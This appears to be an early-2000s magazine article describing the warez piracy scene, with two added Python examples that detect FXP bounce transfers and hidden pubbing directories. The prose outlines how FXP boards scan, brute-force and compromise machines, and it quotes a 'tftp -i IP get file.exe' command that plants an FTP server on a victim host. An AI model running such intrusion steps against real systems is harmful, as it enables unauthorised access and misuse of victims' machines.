A Guide to Internet Piracy

by b-bstf  (charmss5@hotmail.com)

I've written this article after reading a few letters which show that some readers seem to know little about piracy on the Internet.  I don't know everything about piracy on the net, but I would go so far as to say that I know a fair bit about it.

First off, piracy isn't just a few guys who work at cinemas and software stores taking the odd film or game home and sharing it on their home FTP servers or Kazaa.

Piracy on the Internet, or "the warez scene" (as those into it like to call it), is surprisingly organized.  Pirated software/games/movies/anything are called warez and will be referred to as that from now on.

The Piracy "Food Chain"

Warez/Release Groups:  People who release the warez to the warez community.  Often linked with Site Traders.

Site Traders:  People who trade the releases from the above groups on fast servers.

FXP Boards:  Script kiddies who scan/hack/fill vulnerable computers with warez.

IRC Kiddies:  Users of Internet Relay Chat (IRC) who download from "XDCC Bots" or "Fserves."

Kazaa Kiddies:  Users of Kazaa and other P2P (peer-to-peer) programs.

We'll start at the bottom.

Kazaa Kiddies

At the bottom of the piracy food chain we have the Kazaa Kiddies.

There appear to be two groups of these Kazaa Kiddies.  First, the 13-year-old kids with broadband downloading the odd MP3 here and there because they can't afford outrageously overpriced CDs from stores.

Harmless kids, costing no one any real money, pursuing their musical interest.  Also, these are the people being labeled "pirates."  These are the ones "Killing the music industry."  These are the ones who are being sued by the RIAA for thousands of dollars.  Sigh...

Second are the older, P2P veterans who use other P2P networks (Gnutella, BitTorrent, eMule) and programs as well as Kazaa.  In addition to using P2P for music they may also download games, programs, movies, etc.

IRC Kiddies

Not far up from Kazaa Kiddies we have the people who go to IRC for their warez fix.

These folks can be more knowledgeable about computers and the Internet but tend to be just as irritating as the Kazaa Kiddies.  Warez channels are often run by people who have access to a fair amount of pirated material (more about them later).  There are generally two types of these warez channels:

Fserve Channels:  These can often be run by the same Kazaa or IRC Kiddies.  They don't really have a reason to run them; they just like to feel important.  They mainly use the mIRC client's File Server function and some "133t skript" to share their warez direct from their hard drives.

XDCC Channels:  These are usually run by people into FXP Boards and site-trading.  They have access to fast, new warez.  They "employ" people to "hack" into computers with fast Internet connections and install XDCC clients (usually iroffer - project.iroffer.net) which are used to share out pirated goods.  From what I've seen, the people running these channels must primarily do it because they like to have power over a lot of people (being a chan op), but also they will often be given free shell accounts to run BNCs, Eggdrops, etc. by shell companies in exchange for an advert in the topic of the channel.

IRC Kiddies can be found on EFnet (irc.efnet.net) or Rizon (irc.rizon.net).  Other servers and channels can be found through www.packetnews.org.

FXP Boards

FXP is the File Exchange Protocol.  It isn't an actual protocol, just a method of transfer making use of a vulnerability in FTP.

It allows the transfer of files between two FTP servers.  Rather than client-to-server, the transfer becomes server-to-server.  FXP usually allows faster transfer speeds, although it is generally not enabled on commercial servers as it is also a vulnerability known as the "FTP bounce attack."
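
A server-side check for the behaviour described above, as an added example that is not part of the original article: in an FXP transfer the PORT (or EPRT) command names a host other than the client on the control connection, so a strict server or a log review can flag it.  The log entries and addresses are constructed sample data, and the function names are this example's own.

```python
import ipaddress
import re

# PORT h1,h2,h3,h4,p1,p2 (RFC 959) and EPRT |proto|addr|port| (RFC 2428)
PORT_RE = re.compile(r"^PORT\s+(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})$", re.I)
EPRT_RE = re.compile(r"^EPRT\s+(.)([12])\1(.+?)\1(\d{1,5})\1$", re.I)

def parse_data_target(command):
    """Return (ip, port) requested by a PORT/EPRT command, or None if unparseable."""
    command = command.strip()
    m = PORT_RE.match(command)
    if m:
        nums = [int(g) for g in m.groups()]
        if max(nums) > 255:
            return None
        return ipaddress.ip_address(".".join(map(str, nums[:4]))), nums[4] * 256 + nums[5]
    m = EPRT_RE.match(command)
    if m:
        try:
            ip = ipaddress.ip_address(m.group(3))
        except ValueError:
            return None
        port = int(m.group(4))
        return (ip, port) if port <= 65535 else None
    return None

def verdict(peer_ip, command):
    """Classify one control-channel command received from peer_ip."""
    if command.strip().split(" ", 1)[0].upper() not in ("PORT", "EPRT"):
        return None                      # not a data-connection request
    target = parse_data_target(command)
    if target is None:
        return "malformed"
    ip, port = target
    if ip != ipaddress.ip_address(peer_ip):
        return "third-party"             # data channel aimed at another host (FXP / bounce)
    if port < 1024:
        return "low-port"                # data channel aimed at a well-known service port
    return "ok"

def scan(log):
    """Return (peer, command, verdict) for every entry a strict server would refuse."""
    return [(p, c, v) for p, c in log if (v := verdict(p, c)) not in (None, "ok")]

# Constructed sample entries: (control-connection peer, command received)
SAMPLE_LOG = [
    ("198.51.100.7", "USER anonymous"),
    ("198.51.100.7", "PORT 198,51,100,7,195,80"),
    ("203.0.113.9", "PORT 192,0,2,44,4,1"),
    ("203.0.113.9", "PORT 203,0,113,9,0,25"),
    ("203.0.113.9", "EPRT |1|192.0.2.44|6275|"),
    ("198.51.100.7", "PORT 1,2,3"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```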

The Boards:  FXP Boards usually run vBulletin (software from www.vbulletin.org) and their members consist of scanners, hackers, and fillers.  There are also usually a few odd members such as graphics people or administrators, but they don't do much.

The Scanner:  The Scanner's job is to scan IP ranges where fast Internet connections are known to lie (usually universities, etc.) for computers with remote-root vulnerabilities.  We're talking brute forcing MS SQL and NetBIOS passwords, scanning for servers with the Microsoft IIS Unicode bug (yes, that three-year-old one).  Oh yes, FXP Boards are where the lowest of the low script kiddies lurk.  The Scanner will often use already "hacked" computers for his scanning (known as scanstro's), using "remote scan" programs such as SQLHF, X-Scan, fscan, and HScan along with a nice program to hide them (hiderun.exe) from the user of the computer.  Once the Scanner has gotten his results, he'll run off to his FXP Board and post it.  This is where the "Hacker" comes into play.

The "Hacker"/Script Kiddie/dot-slash Kiddie:  Now I think it's fairly obvious what the "Hackers" do.  (They actually call themselves hackers!)  Yes, they break into computers.  Their OS of choice (for breaking into) is usually Windows.  There are many easy-to-exploit vulnerabilities and *NIX scares these people.  The Hacker's job is to run his application and "root" the scanned server.  The program he uses (of course) depends upon the vulnerability the Scanner has scanned for.  For example, if it's a NetBIOS password he will often either use PsExec (www.sysinternals.com) or Dameware NT Utilities.  There are various other vulnerabilities and programs used - too many to list here.  Once he has "rooted" the computer (this usually means getting a remote shell with admin rights), he will use a technique known as "the TFTP method" or "the ECHO method" (tftp -i IP get file.exe) to upload and install an FTP server daemon (this is almost always Serv-U) on his target.  (In the case of the IRC Kiddies this would also be iroffer.)  Once the FTP daemon is installed and working he'll post the "admin" logins to the FTP server on his FXP Board.  Depending on the speed of the compromised computer's (or "pubstro"/"stro") Internet connection and the hard drive space, it will be "taken" either by a Filler or a Scanner.

The Filler:  Now if the "pubstro" is fast enough and has enough hard drive space, it's the Filler's job to get to work filling it with the latest warez (the Filler usually has another source for his warez such as Site Trading).  Once he's done FXPing his warez, the Filler goes back to the board and posts "leech logins" (read only logins) for one and all to use.  What a great community!

FXP Boards are mostly full of script kiddies and people with too much time on their hands.  They like to think the FBI are after them and get very paranoid, but in reality no one really gives a damn what they're up to except the unlucky sysops who get all their bandwidth eaten up because they forgot to patch a three-year-old vulnerability.

The true "n00b" FXP Boards can be found on Wondernet (irc.wondernet.nu) so, if you like, go sign up on one and see what it's all about.

Tip:  Pretend to be female.  This will almost guarantee you a place on a board.  Say you can scan/hack DCOM, NetBIOS, SQL, Apache, and have a 10 MBit .eu 0-hour source.

Site Trading

Next on the list and pretty much at the top or near the top (as far as I've seen) are the Site Traders.  These are generally just people with too much time on their hands who have possibly worked their way up through FXP Boards.  Site Trading is basically trading of pirated material between sites.

The Sites:  These sites have very fast Internet connections (10 Mbit is considered the minimum, 100 Mbit good, and anything higher pretty damn good) and huge hard disk drives (200 GB would probably be the minimum).  These sites are often hosted at schools, universities, people's work, and in Sweden (10 Mbit lines are damn cheap in .se).

These sites are referred to as being "legit."  This means that the owner of the computer knows that they are there and being run.  Fast connections mean a lot to some people.  If you have access to a 100 Mbit line (and are willing to run a warez server there), there are people who would quite happily pay for and have a computer shipped to you just for hosting a site that they will make absolutely no profit from (you can meet them on EFnet).

Unfortunately, this is where credit card fraud can come into Site Trading.  This is frowned upon by pretty much everyone (there is already enough paranoia and risk in Site Trading) but some people do use stolen credit card information to buy hard drives and such.  To be fair, Site Traders aren't a bad bunch - the majority don't even believe in making any money out of it and insist they are just doing it for fun.  Anyways, back to the sites.

glFTPd is considered to be the FTP daemon to use (in fact, a lot of Site Traders and warez groups will not join a site unless it is running glFTPd).  This also means that *NIX is the OS of choice (as there is no glFTPd win port).  As well as running an FTP daemon, the sites run an Eggdrop bot with various scripts installed.  The bot will make an announcement on an IRC channel when a directory is made or an upload completed.  It will also give race information.

The People:  There are basically two ranks in Site Trading: "SiteOps" and "Racers."  SiteOps, as you will have guessed, are the administrators.  There are usually between two and five SiteOps.  One is often the supplier of the site, another the person who found the supplier and guided them through the installation of the FTP daemon.  The others will be friends and people involved in the warez scene.  One or more of the SiteOps will be the "nuker."  It is his job to "nuke" any releases that are old or fake (more about releases shortly).

Racers are the folks who will "race" releases between sites.  Usually they will have access to a number of sites and will FXP releases as soon as they're released.  FXPing a release will gain credits.  The ratio is usually 1:3, so FXPing 100 MB will get them 300 MB credits on the site, allowing them to FXP 300 MB of data from that site, which will gain them 900 MB where they FXP that, etc., etc.  "Racing" of releases occurs when two or more racers are uploading the same file.  The "race" is to upload the most of the release at the fastest speed.  Racing happens shortly after a release is... released.

Warez/Release Groups/"grps"

These are the ones basically supplying everyone with the warez.

These are the ones the MPAA and RIAA don't seem to be too worried about, or at least aren't making a big public fuss about.  However, these groups are known to the FBI and they know that the FBI and whatever other authorities are watching them and collecting evidence.  They know that one day these authorities will strike as they have done in the past.

A lot of these people are just hoping that they won't be caught when it happens.  As a result of this, anyone "high up" is extremely paranoid.  Most users will use multiple BNCs (BouNCer, an IRC proxy) before even going near an IRC network.  A lot of large groups will own their own IRC networks and SSL is used at every opportunity (FTP, IRC, etc.).  It's hard to understand why these people actually do it when there is such a risk.  The main reason is, in my opinion, boredom.  At the end of the day, if you're sitting in front of your computer for most of your life you may as well be doing something other than flaming AOL'ers on IRC, and this sort of thing keeps you busy.

Another reason is geekiness.  Knowing that you were one of the first people on the Internet to see that film, or that it's because of you that thousands of people are now playing that leaked Halflife 2 alpha and there are news articles everywhere about this "anonymous leaker" - it feels good, in a geeky kind of way.

A lot of these people (not all, not all) may have rather uneventful lives and to know that, although at school, college, or work they're considered a loser, they can go home at night and be looked upon as some kind of god within their group of online friends would feel good.

I do not believe that profit is a factor.  These groups insist that they don't do this sort of thing for money, and I believe them.

There's a quote from a DEViANCE NFO file:

We do this just for FUN.  We are against any profit or commercialization of piracy.  We do not spread any release, others do that.  In fact, we BUY all our games with our own hard earned and worked for efforts.  Which is from our own real life non-scene jobs.  As we love game originals.  Nothing beats a quality original.  "If you like this game, BUY it.  We did!"

A quote from Team Razor NFO file:

SUPPORT THE COMPANIES THAT PRODUCE QUALITY SOFTWARE!  IF YOU ENJOYED THIS PRODUCT, BUY IT!  SOFTWARE AUTHORS DESERVE SUPPORT!!

Releases

A release is a piece of pirated material packaged and released by a warez group.

The format of the release varies, but in the case of games or programs the release is usually in bin/cue, compressed with RAR, and split into 15,000,000 byte files.  The naming of the release will usually be something along the lines of: New.Game.3-ReLEASEGROUP

The types of releases vary.  In games there are mainly either CD Images (bin/cue format) or Rips.  Movies are either DivX/Xvid (two or three bin/cue files).  There are many different types of movie releases.  A great list of these can be found at www.vcdquality.com.  Releases will almost always be accompanied by a .NFO file.  This will provide information about the release and the group.

Additional Info

The following information is not from first hand experience, like the past information has been.  This has been obtained from text files, told to me by people, and assumed.  It will be mostly accurate, but there may well be errors.

The main members of any release group are:

The Supplier:  This is the guy working at the local cinema or games store, the guy with the digital camera happy to sneak into the cinema, etc.  Generally these people have to have access to new material, usually before anyone else gets to it.  Often they will also have to have a fairly decent upload speed.

The Cracker:  (Only in games/apps groups)  This will vary between groups.  For example, a VCD/SVCD group would not require a cracker.  But the cracker plays an important role.  He will have to crack the game's protection that stops the game from being played without the official CD.  This guy usually has a fair bit of programming experience and can be quite smart.

Site Supplier:  Similar to Site Trading, however warez groups are often more picky about the sites they choose.  The minimum speed is usually 100 Mbit and often groups will only accept sites that are being supplied by the actual System Ops/Admins themselves.

Courier:  This guy's role is basically Site Trading.  He has to distribute the group's release to other sites.

Terms you may have heard and their meanings:

PRE/PRE'd:  When a release is released announcements will be made across many IRC channels called "PRE Chans."  This is called the "PRE Time" and is the official time of release.  PRE Time is used mainly in site trading.

0*:  This is a reference to how new the release is.

0-sec:  This is a dream - n00b IRC channels often use this term, but they are lying.

0-hour:  Means the release was PRE'd under an hour ago.

0-day:  Means the release was PRE'd under a day ago.  (Typo-error in article, was "an hour ago".)

And so on...

Nuked:  If a release is Nuked, the uploader of the release will lose credits on the site he is Nuked on.  A release is Nuked when it is breaking site rules (like eight hours of PRE or earlier).

Pubstro/Stro:  This is a computer that has been compromised and has an FTP daemon running on it.  It will be used to share warez, mainly to the FXP community.

ScanStro:  Similar to the above, but is used to scan for other vulnerable computers.

Pub/Pubbing:  Pubs are dead.  These are from the old days when many university and business FTP servers had write access enabled on anonymous accounts.  So instead of breaking into a computer, the warez kiddies would just upload their warez and give the IP address to their friends.  This was very popular, but died out for obvious reasons.

Tagging:  Once found a Pub would be "tagged" (a directory or empty file with the name tagged.by.lamepubkiddie or something similar would be made).  The idea was that if a Pub was already "tagged" other Pubbers would leave it alone.  This apparently worked for a while, with people respecting other people's tags and leaving the Pubs alone.  But it certainly hasn't worked for a very long time.

Dir Locking:  This was used in Pubbing to stop people other than your warez group finding and downloading your warez (and slowing the server down).  You would hide it, using directory names such as com1 and  ...   These directory names would also be hard to delete or even open, so it could take some time before the warez were found by the server admin.
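
For an admin checking a writable FTP tree for the tagging and dir-locking leftovers described in the two entries above, an added example (not from the original article) that flags suspicious path components in a file listing.  It goes beyond the names the article mentions and applies the general Windows rules: reserved device names such as com1, and names that end in or consist only of dots and spaces.  The sample paths and function names are constructed for this example.

```python
import re

# Names the Win32 API treats as devices, with or without an extension
RESERVED = {"CON", "PRN", "AUX", "NUL"} | {
    f"{dev}{i}" for dev in ("COM", "LPT") for i in range(1, 10)
}
# Tag markers in the style the article quotes (tagged.by.<name>)
TAG_RE = re.compile(r"tagged[._ -]?by", re.I)

def classify_component(name):
    """Return the reasons one directory or file name looks like a pubbing artifact."""
    reasons = []
    stem = name.split(".", 1)[0].rstrip(" ").upper()
    if stem in RESERVED:
        reasons.append("reserved-device-name")    # hard to open or delete on Windows
    if name.strip(". ") == "":
        reasons.append("dots-or-spaces-only")     # effectively invisible in many listings
    elif name != name.rstrip(". "):
        reasons.append("trailing-dot-or-space")   # Win32 strips these, so the name will not resolve
    if TAG_RE.search(name):
        reasons.append("tag-marker")
    return reasons

def audit(paths):
    """Return (path, component, reason) for every suspicious component in a listing."""
    findings = []
    for path in paths:
        for part in path.split("/"):
            if part in ("", ".", ".."):           # separators and normal relative entries
                continue
            for reason in classify_component(part):
                findings.append((path, part, reason))
    return findings

# Constructed sample listing of an anonymous upload area
SAMPLE_LISTING = [
    "pub/incoming/readme.txt",
    "pub/incoming/com1/ /release.r00",
    "pub/incoming/.../a.bin",
    "pub/upload/tagged.by.example/",
    "pub/docs/notes. /x",
    "pub/docs/console.log",
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_LISTING):
        print(finding)
```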

Raping:  The act of Raping an FTP server is when someone downloads pretty much everything they can from it at a very fast speed.  It's frowned upon.

Leeching:  Downloading a lot without uploading.

PubStealing/Rehacking:  Back "in the day" this would have referred to uploading to an already tagged Pub.  Now it means replacing someone else's Serv-U with yours.  PubStealing is frowned upon and people will often be banned from FXP Boards if they are found to be doing it.

Securing:  The act of Securing a pubstro would involve deleting key files such as ftp.exe, tftp.exe, cmd.exe, etc. or changing the username/password.  Securing methods depend upon the vulnerability.

Some warez related links:

www.nforce.nl  - A site that archives .NFOs and releases.  This site is frowned upon by people in "the scene."

www.isonews.com  - A site seized by the federal government.

www.vcdquality.com  - For movies specifically.

www.fxp.nl  - FXP stuff.

www.jtpfxp.net  - Rather large archive of FXP/script kiddie tutorials.

www.packetnews.org  - XDCC search engine.

www.downhillbattle.org   - Not related, but fuck the RIAA!

If I've mentioned a program and not given a link it's because it can be easily found through Google.

That's all.  I hope this has given someone a better view of piracy.
